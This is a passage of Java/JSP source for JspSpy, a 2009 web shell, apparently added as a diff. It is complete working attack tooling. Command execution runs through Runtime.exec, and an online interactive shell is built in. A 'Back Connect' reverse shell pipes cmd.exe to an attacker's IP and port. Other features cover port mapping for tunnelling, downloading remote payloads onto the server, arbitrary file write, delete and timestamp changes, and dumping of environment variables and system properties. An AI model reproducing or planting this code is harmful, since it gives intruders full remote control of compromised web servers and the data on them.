"); +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
Copyright (C) 2009 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)

"+ +"

File Content

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
"+ +"
"+ +"

Create / Edit File »

"+ +""+ +"

Current File (import new file name and new file)

"+ +"

File Content

"+ +"

"+ +"
"+ +"
"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = f.canExecute() ? "checked=\"checked\"" : ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
"+ +"
"+ +"

Set File Property »

"+ +"

Current file (fullpath)

"+ +" "+ +"

Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

"+ +"

Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; +String read = request.getParameter("read"); +String write = request.getParameter("write"); +String execute = request.getParameter("execute"); +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); +if (Util.isEmpty(read)) { +file.setReadable(false); +} else { +file.setReadable(true); +} +if (Util.isEmpty(write)) { +file.setWritable(false); +} else { +file.setWritable(true); +} +if (Util.isEmpty(execute)) { +file.setExecutable(false); +} else { +file.setExecutable(true); +} +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
"+ +"
"+ +"

Execute Program »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"+ +"

Execute Shell »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
"); +out.println("
");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
"); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.forjj.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
"+ +"
"+ +"

Remote File DownLoad »

"+ +"

"+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.forjj.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

PortMap >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

"+ +" "+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

Back Connect >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

"+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

System Properties >>

"+ +"
"+ +"
"+ +"
    "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
  • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); +} +out.println("

System Environment >>

    "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); +} +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
"); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
"); +out.println("

Shell OnLine »


"); +out.println("
"+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
"+ +"
"+ +" "+ +"
"+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
"+ +" " +); +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流17 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { 